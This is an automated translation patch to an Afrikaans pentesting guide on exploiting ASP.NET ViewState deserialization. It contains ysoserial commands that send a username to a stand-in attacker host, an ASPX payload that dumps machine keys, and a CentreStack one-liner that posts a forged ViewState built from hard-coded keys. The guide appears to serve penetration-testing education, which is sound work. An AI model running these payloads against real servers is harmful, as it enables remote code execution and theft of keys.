From 8573fc038fee7ba3723cb0839bc4ee9674267188 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Wed, 20 Aug 2025 09:11:56 +0000
Subject: [PATCH] Translated
 ['src/pentesting-web/deserialization/exploiting-__viewstate-p

---
 .../exploiting-__viewstate-parameter.md       | 58 +++++++++----------
 1 file changed, 28 insertions(+), 30 deletions(-)

diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 7abc3a84d..60ba5f36d 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -4,9 +4,9 @@
 
 
 
-## Wat is ViewState
+## What is ViewState
 
-**ViewState** dien as die standaardmeganisme in ASP.NET om bladsy- en kontroledata oor webblaaie te handhaaf. Tydens die weergawe van 'n bladsy se HTML, word die huidige toestand van die bladsy en waardes wat tydens 'n postback bewaar moet word, in base64-gecodeerde strings geserealiseer. Hierdie strings word dan in versteekte ViewState-velde geplaas.
+**ViewState** dien as die standaardmeganisme in ASP.NET om bladsy- en kontroledata oor webblaaie te handhaaf. Tydens die weergawe van 'n bladsy se HTML, word die huidige toestand van die bladsy en waardes wat tydens 'n postback bewaar moet word, in base64-gecodeerde strings geserialiseer. Hierdie strings word dan in versteekte ViewState-velde geplaas.
 
 ViewState-inligting kan gekarakteriseer word deur die volgende eienskappe of hul kombinasies:
 
@@ -17,18 +17,18 @@ ViewState-inligting kan gekarakteriseer word deur die volgende eienskappe of hul
 - **Base64 + Geënkripteer**:
 - Enkripsie word toegepas wanneer die `ViewStateEncryptionMode` eienskap op waar gestel is, wat die vertroulikheid van ViewState-data verseker.
 
-## Toetsgevalle
+## Test Cases
 
 Die beeld is 'n tabel wat verskillende konfigurasies vir ViewState in ASP.NET op grond van die .NET-raamwerkweergawe uiteensit. Hier is 'n opsomming van die inhoud:
 
 1. Vir **enige weergawe van .NET**, wanneer beide MAC en Enkripsie gedeaktiveer is, is 'n MachineKey nie nodig nie, en dus is daar geen toepaslike metode om dit te identifiseer nie.
 2. Vir **weergawes onder 4.5**, as MAC geaktiveer is maar Enkripsie nie, is 'n MachineKey nodig. Die metode om die MachineKey te identifiseer, word "Blacklist3r" genoem.
-3. Vir **weergawes onder 4.5**, ongeag of MAC geaktiveer of gedeaktiveer is, as Enkripsie geaktiveer is, is 'n MachineKey nodig. Die identifisering van die MachineKey is 'n taak vir "Blacklist3r - Toekomstige Ontwikkeling."
-4. Vir **weergawes 4.5 en hoër**, vereis alle kombinasies van MAC en Enkripsie (of albei waar is, of een waar is en die ander vals is) 'n MachineKey. Die MachineKey kan geïdentifiseer word met "Blacklist3r."
+3. Vir **weergawes onder 4.5**, ongeag of MAC geaktiveer of gedeaktiveer is, as Enkripsie geaktiveer is, is 'n MachineKey nodig. Die identifisering van die MachineKey is 'n taak vir "Blacklist3r - Future Development."
+4. Vir **weergawes 4.5 en hoër**, vereis alle kombinasies van MAC en Enkripsie (of albei waar is, of een waar en die ander vals) 'n MachineKey. Die MachineKey kan geïdentifiseer word met "Blacklist3r."
 
-### Toetsgeval: 1 – EnableViewStateMac=false en viewStateEncryptionMode=false
+### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false
 
-Dit is ook moontlik om die ViewStateMAC heeltemal te deaktiveer deur die `AspNetEnforceViewStateMac` registersleutel op nul te stel in:
+Dit is ook moontlik om die ViewStateMAC heeltemal te deaktiveer deur die `AspNetEnforceViewStateMac` register sleutel op nul te stel in:
 ```
 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
 ```
@@ -38,13 +38,13 @@ Jy kan probeer om te identifiseer of ViewState MAC beskerm is deur 'n versoek te
 ```
 ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
 ```
-### Toetsgeval 1.5 – Soos Toetsgeval 1, maar die ViewState koekie word nie deur die bediener gestuur nie
+### Test case 1.5 – Soos Test case 1, maar die ViewState koekie word nie deur die bediener gestuur nie
 
 Ontwikkelaars kan **ViewState** verwyder sodat dit nie deel van 'n HTTP-versoek word nie (die gebruiker sal nie hierdie koekie ontvang nie).\
 Mens kan aanneem dat as **ViewState** **nie teenwoordig** is nie, hul implementering **veilig** is teen enige potensiële kwesbaarhede wat met ViewState deserialisering ontstaan.\
-Dit is egter nie die geval nie. As ons **ViewState parameter** by die versoekliggaam voeg en ons geserialiseerde payload wat met ysoserial geskep is, stuur, sal ons steeds in staat wees om **kode-uitvoering** te bereik soos in **Geval 1** gewys.
+Dit is egter nie die geval nie. As ons **ViewState parameter** aan die versoekliggaam voeg en ons geserialiseerde payload wat met ysoserial geskep is, stuur, sal ons steeds in staat wees om **kode-uitvoering** te bereik soos in **Case 1** gewys.
 
-### Toetsgeval: 2 – .Net < 4.5 en EnableViewStateMac=true & ViewStateEncryptionMode=false
+### Test Case: 2 – .Net < 4.5 en EnableViewStateMac=true & ViewStateEncryptionMode=false
 
 Om **ViewState MAC** vir 'n **spesifieke bladsy** te **aktiveer**, moet ons die volgende veranderinge aan 'n spesifieke aspx-lêer maak:
 ```bash
@@ -61,7 +61,7 @@ Ons kan dit ook doen vir die **oorhoofse** toepassing deur dit in die **web.conf
 </system.web>
 </configuration>
 ```
-Aangesien die parameter hierdie keer MAC-beskermd is, moet ons eers die sleutel wat gebruik is, hê om die aanval suksesvol uit te voer.
+Aangesien die parameter hierdie keer MAC-beskerm is, moet ons eers die sleutel wat gebruik is, hê om die aanval suksesvol uit te voer.
 
 Jy kan probeer om [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) te gebruik om die sleutel te vind wat gebruik is.
 ```
@@ -102,7 +102,7 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Inv
 
 --generator = {__VIWESTATEGENERATOR parameter value}
 ```
-In gevalle waar die `_VIEWSTATEGENERATOR` parameter **nie gestuur** word deur die bediener nie, **hoef** jy **nie** die `--generator` parameter **te verskaf** nie, **maar hierdie**:
+In gevalle waar die `_VIEWSTATEGENERATOR` parameter **nie gestuur** word nie deur die bediener, hoef jy **nie** die `--generator` parameter **te verskaf** nie, maar hierdie:
 ```bash
 --apppath="/" --path="/hello.aspx"
 ```
@@ -112,13 +112,13 @@ In hierdie geval is dit nie bekend of die parameter met MAC beskerm word nie. Da
 
 **In hierdie geval is die** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **module in ontwikkeling...**
 
-**Voor .NET 4.5** kan ASP.NET **'n** **ongeënkripteerde** \_`__VIEWSTATE`\_parameter van die gebruikers **aanvaar** **selfs** as **`ViewStateEncryptionMode`** op _**Altijd**_ gestel is. ASP.NET **kontroleer slegs** die **teenwoordigheid** van die **`__VIEWSTATEENCRYPTED`** parameter in die versoek. **As 'n mens hierdie parameter verwyder en die ongeënkripteerde payload stuur, sal dit steeds verwerk word.**
+**Voor .NET 4.5** kan ASP.NET **'n** **ongeënkripteerde** \_`__VIEWSTATE`\_parameter van die gebruikers **aanvaar** **selfs** as **`ViewStateEncryptionMode`** op _**Altyd**_ gestel is. ASP.NET **kontroleer slegs** die **teenwoordigheid** van die **`__VIEWSTATEENCRYPTED`** parameter in die versoek. **As 'n mens hierdie parameter verwyder en die ongeënkripteerde payload stuur, sal dit steeds verwerk word.**
 
 Daarom, as die aanvallers 'n manier vind om die Masjien Sleutel via 'n ander kwesbaarheid soos lêer traversering te verkry, kan die [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) opdrag wat in die **Geval 2** gebruik is, gebruik word om RCE uit te voer met behulp van die ViewState deserialisering kwesbaarheid.
 
 - Verwyder die `__VIEWSTATEENCRYPTED` parameter uit die versoek om die ViewState deserialisering kwesbaarheid te benut, anders sal dit 'n Viewstate MAC validasie fout teruggee en die uitbuiting sal misluk.
 
-### Toetsgeval: 4 – .Net >= 4.5 en EnableViewStateMac=true/false en ViewStateEncryptionMode=true/false behalwe albei eienskappe op false
+### Toetsgeval: 4 – .Net >= 4.5 en EnableViewStateMac=true/false en ViewStateEncryptionMode=true/false behalwe dat beide eienskappe op false gestel is
 
 Ons kan die gebruik van die ASP.NET raamwerk afdwing deur die onderstaande parameter binne die web.config lêer soos hieronder aan te dui.
 ```xml
@@ -128,7 +128,7 @@ Alternatiewelik kan dit gedoen word deur die onderstaande opsie binne die `machi
 ```bash
 compatibilityMode="Framework45"
 ```
-Soos in die vorige keer is die **waarde geënkripteer.** Dan, om 'n **geldige payload te stuur, het die aanvaller die sleutel nodig**.
+Soos in die vorige is die **waarde geënkripteer.** Dan, om 'n **geldige las te stuur, het die aanvaller die sleutel nodig**.
 
 Jy kan probeer om [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) te gebruik om die sleutel te vind wat gebruik word:
 ```
@@ -151,7 +151,7 @@ Sodra 'n geldige masjien sleutel geïdentifiseer is, **is die volgende stap om '
 ```
 ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 ```
-As jy die waarde van `__VIEWSTATEGENERATOR` het, kan jy probeer om die `--generator` parameter met daardie waarde te **gebruik** en die parameters `--path` en `--apppath` te **omskip**.
+As jy die waarde van `__VIEWSTATEGENERATOR` het, kan jy probeer om die `--generator` parameter met daardie waarde te **gebruik** en die parameters `--path` en `--apppath` te **om te laat**.
 
 ![](https://notsosecure.com/sites/all/assets/group/nss_uploads/2019/06/4.2.png)
 
@@ -160,20 +160,20 @@ As jy die waarde van `__VIEWSTATEGENERATOR` het, kan jy probeer om die `--genera
 ### Toetsgeval 6 – ViewStateUserKeys word gebruik
 
 Die **ViewStateUserKey** eienskap kan gebruik word om teen 'n **CSRF-aanval** te **verdedig**. As so 'n sleutel in die toepassing gedefinieer is en ons probeer om die **ViewState** payload te genereer met die metodes wat tot nou toe bespreek is, sal die **payload nie deur die toepassing verwerk word**.\
-Jy moet nog een parameter gebruik om die payload korrek te skep:
+Jy moet een meer parameter gebruik om die payload korrek te skep:
 ```bash
 --viewstateuserkey="randomstringdefinedintheserver"
 ```
-### Resultaat van 'n Suksesvolle Exploit <a href="#poc" id="poc"></a>
+### Resultaat van 'n Succesvolle Exploit <a href="#poc" id="poc"></a>
 
-Vir al die toets gevalle, as die ViewState YSoSerial.Net payload **suksesvol** werk, dan reageer die bediener met “**500 Interne bediener fout**” met 'n responsinhoud van “**Die staat-inligting is ongeldig vir hierdie bladsy en mag beskadig wees**” en ons kry die OOB versoek.
+Vir al die toets gevalle, as die ViewState YSoSerial.Net payload **suksesvol** werk, dan antwoord die bediener met “**500 Interne bediener fout**” met die antwoordinhoud “**Die staat-inligting is ongeldig vir hierdie bladsy en mag beskadig wees**” en ons kry die OOB versoek.
 
 Kontroleer vir [verdere inligting hier](<https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/[**https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)/README.md>)
 
-### Dumping ASP.NET Masjien Sleutels via Reflectie (SharPyShell/SharePoint ToolShell)
+### Dumping ASP.NET Masjien Sleutels via Refleksie (SharPyShell/SharePoint ToolShell)
 
-Aanvallers wat in staat is om **arbitraire ASPX kode op te laai of uit te voer** binne die teiken web wortel kan direk die geheime sleutels wat `__VIEWSTATE` beskerm, verkry in plaas van om dit te brute-force.
-'n Minimale payload wat die sleutels lek, benut interne .NET klasse deur middel van reflectie:
+Aanvallers wat in staat is om **op te laai of arbitrêre ASPX kode** binne die teiken web wortel uit te voer, kan direk die geheime sleutels wat `__VIEWSTATE` beskerm, verkry in plaas van om hulle te brute-force.
+'n Minimale payload wat die sleutels lek, benut interne .NET klasse deur refleksie:
 ```csharp
 <%@ Import Namespace="System.Web.Configuration" %>
 <%@ Import Namespace="System.Reflection" %>
@@ -201,24 +201,22 @@ curl "http://victim/page.aspx?__VIEWSTATE=<PAYLOAD>"
 ```
 Hierdie **key-exfiltration primitive** is in 2025 massaal teen on-prem SharePoint bedieners uitgebuit ("ToolShell" – CVE-2025-53770/53771), maar dit is van toepassing op enige ASP.NET toepassing waar 'n aanvaller server-kant kode kan uitvoer.
 
-## 2024-2025 Werklike Exploit-scenario's en Hard-gecodeerde Masjien Sleutels
+## 2024-2025 Werklike Exploitasiestories en Hard-gecodeerde Masjien Sleutels
 
 ### Microsoft “openlik bekendgemaakte masjien sleutels” golf (Des 2024 – Feb 2025)
-Microsoft Threat Intelligence het massale uitbuiting van ASP.NET webwerwe gerapporteer waar die *machineKey* voorheen op openbare bronne (GitHub gists, blogposte, paste sites) gelek is. Teenstanders het hierdie sleutels genummeerd en geldige `__VIEWSTATE` gadgets gegenereer met die nuwer `ysoserial.net` 1.41 `--minify` en `--islegacy` vlae om WAF lengte beperkings te ontduik:
+Microsoft Threat Intelligence het massale uitbuiting van ASP.NET webwerwe gerapporteer waar die *machineKey* voorheen op openbare bronne (GitHub gists, blog plasings, paste sites) gelek is. Teenstanders het hierdie sleutels genummeerde en geldige `__VIEWSTATE` gadgets gegenereer met die nuwer `ysoserial.net` 1.41 `--minify` en `--islegacy` vlae om WAF lengte beperkings te ontduik:
 ```bash
 ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \
 --validationkey=<LEAKED_VALIDATION_KEY> --validationalg=SHA1 \
 --decryptionkey=<LEAKED_DECRYPTION_KEY> --decryptionalg=AES \
 --generator=<VIEWSTATEGEN> --minify
 ```
-Rotasie van statiese sleutels of oorgang na *AutoGenerate* sleutels in Web .config (`<machineKey ... validationKey="AutoGenerate" decryptionKey="AutoGenerate" />`) verminder hierdie klas aanvalle. {{#ref}}
-
-{{#endref}}
+Rotasie van statiese sleutels of oorskakeling na *AutoGenerate* sleutels in Web .config (`<machineKey ... validationKey="AutoGenerate" decryptionKey="AutoGenerate" />`) verminder hierdie klas aanvalle.
 
 ### CVE-2025-30406 – Gladinet CentreStack / Triofox hard-gecodeerde sleutels
-Kudelski Security het ontdek dat verskeie CentreStack / Triofox weergawe met identiese `machineKey` waardes verskaf is, wat nie-geoutentiseerde afstands kode-uitvoering deur ViewState vervalsing moontlik maak (CVE-2025-30406).
+Kudelski Security het ontdek dat verskeie CentreStack / Triofox weergawe met identiese `machineKey` waardes verskaf is, wat nie-geoutentiseerde afstands kode uitvoering deur ViewState vervalsing moontlik maak (CVE-2025-30406).
 
-Een-liner uitbuiting:
+One-liner exploit:
 ```bash
 ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
 --validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \
@@ -227,7 +225,7 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
 --decryptionalg=AES --generator=24D41AAB --minify \
 | curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx
 ```
-Fixeer in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – opgradeer of vervang die sleutels onmiddellik. {{#ref}}
+Fix in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – opgradeer of vervang die sleutels onmiddellik. {{#ref}}
 
 
 {{#endref}}